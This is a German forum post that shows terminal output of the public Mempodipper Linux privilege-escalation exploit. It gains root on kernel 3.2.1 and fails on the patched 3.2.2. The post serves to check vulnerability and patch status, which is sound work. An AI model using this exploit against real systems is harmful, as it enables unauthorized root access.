(01-27-2012 05:50 AM)tomdooley Wrote: (01-25-2012 10:06 AM)tomhb Wrote: Ohne grsec hat man auf einem Debian GNU/Linux innerhalb einiger
Sekunden eine rootshell.
Also soweit ich weiß, gibts auf der "stable" Debian Squeeze derzeit die Version 2.6.32. Lt. Angaben betrifft den Exploit nur die Kernel ab 2.6.39.
Natuerlich muessen die Voraussetzungen gegeben sein. Wie es bei einem stable,
testing oder sid unter Debian GNU/Linux "out of the box" aussieht, weiss ich oft
nicht so genau, weil wir die Kernel eben selber (meist mit grsecurity oder tomoyo)
machen.
Beispiel unter 3.2.1
Code:
tom@myhost:/daten$ uname -a
Linux myhost 3.2.1 #2 SMP Thu Jan 19 03:31:38 CET 2012 x86_64 GNU/Linux
tom@myhost:/daten$ id
uid=1000(tom) gid=1000(tom) Gruppen=1000(tom),...
tom@myhost:/daten$ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/10357/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401fa8.
[+] Calculating su padding.
[+] Seeking to offset 0x401f99.
[+] Executing su with shellcode.
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),...
Und nun mit 3.2.2
Code:
tom@myhost:/daten$ uname -a
Linux myhost 3.2.2 #1 SMP Fri Jan 27 02:03:33 CET 2012 x86_64 GNU/Linux
tom@myhost:/daten$ id
uid=1000(tom) gid=1000(tom) Gruppen=1000(tom),...
tom@myhost:/daten$ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6179/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401fa8.
[+] Calculating su padding.
[+] Seeking to offset 0x401f99.
[+] Executing su with shellcode.
tom@myhost:/daten$
Geht also mit dem 3.2.2 von gestern nicht mehr.
gruss tom